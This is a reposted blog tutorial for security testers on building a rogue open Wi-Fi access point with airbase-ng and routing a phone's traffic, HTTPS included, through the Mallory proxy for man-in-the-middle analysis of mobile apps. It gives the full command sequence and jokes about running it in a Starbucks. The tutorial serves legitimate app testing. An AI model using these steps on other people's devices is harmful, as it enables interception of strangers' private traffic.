Thanks to Tom Neaves (@tomneaves) for putting up this guide back up on his blog after a brief downtime. I found this really useful when I was doing mobile application testing (with hostapd being a bitch and not working except with specific versions of chipsets.) We're placing the tutorial here on our site so that others who are looking for it have more than one place to go to, but all credit to writing this and coming up with it go to Tom. Here you go, and happy mobile app hacking!
The original article is here: http://blog.tomneaves.com/post/3523418896/using-mallory-and-airbase-ng-to-mitm-mobile
————————————————————————————–
I first found out about Mallory at the OWASP 2011 Summit in Portugal earlier this month. I was speaking to Mike Zusman (@schmoilito) of the Intrepidus Group who mentioned it to me. Mallory is a transparent TCP and UDP proxy which can be used to intercept network streams and is especially useful for blackbox network analysis of mobile applications. Previously I had used Charles for OS X to analyse and mess with mobile applications running inside the iOS Simulator from a whitebox perspective.
I booted up Ubuntu and eagerly followed the step-by-step instructions for installing Mallory. However, I was soon stumped when I saw that hostapd was being mentioned (Step Two). I have a history with hostapd, it has stolen many hours of my life. Anyway, they use hostapd in their example to setup a soft access point. HostAP drivers are for Prism chipset cards only, meaning my Intel 4965 (iwlagn) no likey. Painful. However, I was pretty sure I could deviate from their instructions and use airbase-ng instead. I skipped out the whole of “Step Two”, installed Mallory (Step Three) and then modified “Step Four” a little, namely not using dnsmasq and the airbase-ng changes.
Rather than confusing you completely and having you swap between their instructions and mine, I will list them all here.
I am using a HP EliteBook 6930p running Ubuntu 10.10 but you must use a slightly older kernel; 2.6.32-25-generic-pae. I found out that airbase-ng has a nasty bug with the Intel cards on the most recent kernel resulting in it being locked to channel “255.” Again, this bug has claimed minutes of my life that I will never get back so trust me on this one! I believe you can patch the drivers or something but let’s not go there for now.
I have the laptop connected to my local network via Ethernet (eth0) gaining an IP address via DHCP. The wireless interface (wlan0) is up but not associated with any wireless networks.
We first want to install all the dependencies that Mallory needs, and there’s a load of ‘em!
sudo apt-get install mercurial;
sudo apt-get install python-pyasn1;
sudo apt-get install python-netfilter;
sudo apt-get install libnetfilter-conntrack-dev;
sudo apt-get install python2.6-dev;
sudo apt-get install python-setuptools;
sudo easy_install pynetfilter_conntrack;
sudo apt-get install netfilter-extensions-source;
sudo apt-get install libnetfilter-conntrack3-dbg;
sudo apt-get install python-paramiko;
sudo apt-get install python-imaging;
If you are installing on a 32 bit system then you’ll need to do the following:
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_i386.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_i386.deb
For a 64 bit system grab this instead:
wget http://ubuntu.cs.utah.edu/ubuntu/pool/universe/libn/libnetfilter-conntrack/libnetfilter-conntrack1_0.0.99-1_amd64.deb
sudo dpkg -i libnetfilter-conntrack1_0.0.99-1_amd64.deb
Now is a good time to install the aircrack-ng suite of tools if you don’t already have ‘em. Also, we will want to install dhcp3-server to handle wireless clients.
sudo apt-get install aircrack-ng; sudo apt-get install dhcp3-server;
Let’s grab Mallory:
hg clone http://bitbucket.org/IntrepidusGroup/mallory
The last thing we really need to configure is the dhcpd.conf file that dhcp3-server will use to give out IP addresses to our wireless clients. You can download one that I have already prepared for you here. You need to put this in /etc/dhcpd3/ and only change one thing; the domain-name-servers bit to reflect your LAN’s DNS server. In the sample dhcpd.conf this is 192.168.1.254. Change this to what yours is. If you don’t know then have a look at /etc/resolv.conf and it will probably be in here if you got your IP via DHCP. Once changed, save and exit.
option domain-name-servers 192.168.1.254;
Now we are ready to rock and roll.
As stated previously, my laptop is plugged into my local network via Ethernet (eth0) and the wireless interface (wlan0) is up but not associated to anything. My laptop’s DNS server is 192.168.1.254 (which is reflected in the dhcpd.conf file we hacked up). All that’s left are a few more manual steps and running another script that I prepared earlier. You will need to be root to do all of this goodness.
Download a script I created (rah.sh) that automates a load of the painful bits prior to starting up Mallory – don’t run it yet though! We will still need to do a couple of things manually but this will save you some time. Nearly there, don’t worry!
We are all dressed up and ready for the ball. The previous steps you won’t need to do again everytime you want to run Mallory. From here on in it’s rinse and repeat.
We want to kill the network-manager as it can be a bugger. We also want to bring up the Ethernet interface if we haven’t done so already and grab an IP address.
stop network-manager ifconfig eth0 up dhclient eth0
We want to bring up our wireless interface (if it wasn’t already) and whack it into monitor mode.
ifconfig wlan0 up airmon-ng start wlan0
This will create a virtual interface mon0. We will use this to create our soft access point and to ultimately create a TAP interface called at0. The command below will create a completely open access point with the SSID of “rah” on channel 6.
airbase-ng -e rah -c 6 -v mon0
You will need to open another terminal window now as airbase-ng will stay in the foreground. In the new terminal window now execute the rah.sh script you downloaded. You may need to chmod this badboy if the permissions give you crap.
chmod +x rah.sh ./rah.sh
Time to run Mallory!
Mallory has too components; a console and a GUI. This isn’t entirely obvious (or wasn’t to me at least) the first time I started playing about. We will start the Mallory debug console in th foreground in one terminal window and open another and start the GUI. You will need to be root to do this.
cd /mallory/src/ python mallory.py python launchgui.py
The GUI will popup, click on the “Streams” tab and then click the “Intercept” and “Auto Send” buttons in. This will tell the console to send all traffic to the GUI to fiddle with. Now go get your iPhone or other mobile device and have it join the “rah” wireless network and have some fun. A side note here is that you probably want to make sure the RF signal is on the low side as you’re bridging wireless clients out onto the Internet using your computer. I wouldn’t recommend setting this up in a Starbucks unless you’re that way inclined.
Running Mallory with the default options will flip all the images the iPhone loads upside down so you will know you’re correctly doing a MiTM attack. If you want to intercept HTTPS then you need to start the Mallory console with the following parameters:
python mallory.py -p sslproto.SSLProtocol python launchgui.py
Click on the “Streams” tab again and click in the “Intercept” and “Auto Send” buttons. In no time you’ll see the window on the left start scrolling with the HTTPS connection. Obviously you’ll have to click through the certificates warnings on your mobile phone.
The guys at Intrepidus Group did a presentation at Black Hat USA 2010 which is on YouTube in 5 parts. That will give you a good idea of all the funky stuff you can do. I didn’t want this post to be a complete tutorial or to take anything away / repeat anything the guys at Intrepidus Group have done. Check out their blog which has the more complex features of Mallory documented, such as having Mallory carry out SSL MiTM on a non-standard port.
Hopefully this blog post has taken some of the pain away in setting up Mallory when you don’t have a Prism wireless card. I haven’t long been playing with Mallory myself but please hit me up if you run into problems and I’ll try to help.
Lastly, I’d like to thank the Intrepidus Group guys for creating a cool tool (especially with the extendable plug-in functionality) and sharing with the community. 
)